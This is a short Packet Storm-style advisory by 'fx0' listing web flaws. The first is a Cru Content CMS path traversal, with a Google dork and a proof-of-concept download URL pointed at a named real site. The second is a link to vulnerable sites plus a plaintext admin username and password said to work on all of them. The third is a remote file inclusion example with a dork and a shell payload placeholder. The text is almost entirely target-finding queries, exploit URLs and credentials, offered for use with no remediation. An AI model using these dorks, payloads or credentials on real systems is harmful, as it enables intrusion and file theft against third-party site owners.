Cru Content CMS suffers from a remote file disclosure vulnerability.
523cc7e9539b82349e231e34a659d25dea0e81a82243e0f81879dd40a0deed9b
[~]"Cru Content" Remote File Download Vulnerability
[~]CMS Site:crudigital.com.au<http://crudigital.com.au>
[~]Dork:"Powered By Cru Content"
[~]POC:www.cloudland.tv/cms/download.php?file=../index.php<http://www.cloudland.tv/cms/download.php?file=../index.php>
[~]Found by fx0
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
[~]This vuln is just pure human stupidity
[~]You can find vuln links here = http://www.warpstudio.com/hrvatski/reference/
[~]For every site the username and the password is the same
[~]Admin path /admin/
[~]Username:atila
[~]Password:bicbozji
[~]Found by fx0.
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
[~]Dork: inurl:".php?func=page_cms"
[~]Ex: www.site.com/index.php?func=<http://www.site.com/index.php?func=><shell.txt?>
[~]Found by fx0.
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
ye something from me...
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed